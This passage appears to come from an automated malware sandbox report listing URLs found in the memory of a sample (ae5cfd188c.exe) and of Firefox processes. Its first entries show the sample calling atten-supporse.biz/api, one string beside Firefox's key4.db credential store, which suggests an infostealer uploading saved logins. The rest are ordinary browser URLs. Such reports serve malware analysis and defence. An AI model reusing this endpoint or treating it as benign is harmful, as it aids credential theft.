                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2753582951.000000000543C000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2750675747.000000000543C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                          Source: ae5cfd188c.exe, 00000007.00000003.2602849220.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/%
                          Source: ae5cfd188c.exe, 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2675012706.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2576960562.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2621695300.0000000000C61000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz//
                          Source: ae5cfd188c.exe, 00000007.00000003.2675964314.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2716989299.000000000543C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/=
                          Source: ae5cfd188c.exe, 00000007.00000003.2675964314.0000000000C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/M
                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2813369882.0000000000CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
                          Source: ae5cfd188c.exe, 00000007.00000003.2621573612.0000000000C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api%
                          Source: ae5cfd188c.exe, 0000000A.00000003.2657437696.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiW6Wl
                          Source: ae5cfd188c.exe, 0000000A.00000003.2656059323.0000000000CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiW6WlN&
                          Source: ae5cfd188c.exe, 0000000A.00000003.2684316064.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2717480504.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiW6Wlv
                          Source: ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2675780705.0000000000C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiZ
                          Source: ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apia
                          Source: ae5cfd188c.exe, 00000007.00000003.2572489789.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2572381559.0000000000C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apie
                          Source: ae5cfd188c.exe, 00000007.00000003.2675710575.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2621573612.0000000000C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apille
                          Source: ae5cfd188c.exe, 00000007.00000003.2675710575.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2602875312.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2621573612.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2602900867.0000000000C75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apindows
                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/~i
                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api
                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api$
                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/api.default-release/key4.dbPK
                          Source: ae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz:443/apiW6Wl
                          Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
                          Source: firefox.exe, 00000018.00000003.2736929005.000002BA61CE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
                          Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://baidu.com
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
                          Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                          Source: firefox.exe, 00000018.00000002.2842971512.000002BA5BA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842971512.000002BA5BA95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
                          Source: firefox.exe, 00000018.00000003.2766500542.000002BA5B07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net
                          Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/
                          Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://content.cdn.mozilla.net
                          Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                          Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com
                          Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/
                          Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://contile.services.mozilla.com/v1/tiles
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://coverage.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://crash-stats.mozilla.org/report/index/
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/993268
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://dap-02.api.divviup.org
                          Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
                          Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
                          Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
                          Source: firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
                          Source: firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
                          Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
                          Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                          Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889988240.000035F0F6404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2890720669.0000372F1F704000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                          Source: firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?t=ffab&q=
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/y
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
